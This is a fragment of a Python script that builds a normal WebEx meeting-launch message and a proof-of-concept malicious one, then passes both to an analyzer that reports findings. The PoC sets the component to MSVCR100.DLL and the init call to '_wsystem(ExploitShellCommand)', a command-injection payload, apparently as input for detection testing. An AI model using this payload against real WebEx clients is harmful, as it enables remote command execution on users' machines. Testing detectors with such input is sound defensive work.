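                        "NameValue(MeetingID_Name,MeetingID);FinishCall(szCookie);"),
})
POC_MESSAGE = json.dumps({
    "GpcProductRoot": "WebEx",
    "GpcComponentName": _b64("MSVCR100.DLL"),
    "GpcInitCall": _b64("_wsystem(ExploitShellCommand);"),
})

if __name__ == "__main__":
    for label, message in (("normal", BENIGN_MESSAGE), ("poc", POC_MESSAGE)):
        print(label, analyze_launch_meeting(message)["findings"])
```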